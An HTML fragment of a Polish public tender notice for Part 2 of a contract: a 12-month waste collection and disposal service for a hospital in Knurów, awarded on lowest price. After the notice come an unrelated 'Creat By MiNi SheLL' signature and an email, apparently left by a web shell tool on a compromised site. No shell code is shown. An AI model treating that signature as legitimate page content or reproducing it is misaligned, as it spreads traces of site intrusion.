<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa w zakresie odbioru, transportu i unieszkodliwiania odpadów niebezpiecznych i innych niż niebezpieczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca odbiór, transport (przewóz)                                         i unieszkodliwianie odpadów niebezpiecznych i innych niż niebezpieczne przez Wykonawcę ze Szpitala w Knurowie Sp. z o.o. Część II - odpady niebezpieczne i inne niż niebezpieczne. Szczegółowy opis przedmiotu zamówienia określony został w Załączniku nr 9 Formularz cenowy do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6, 90.53.30.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com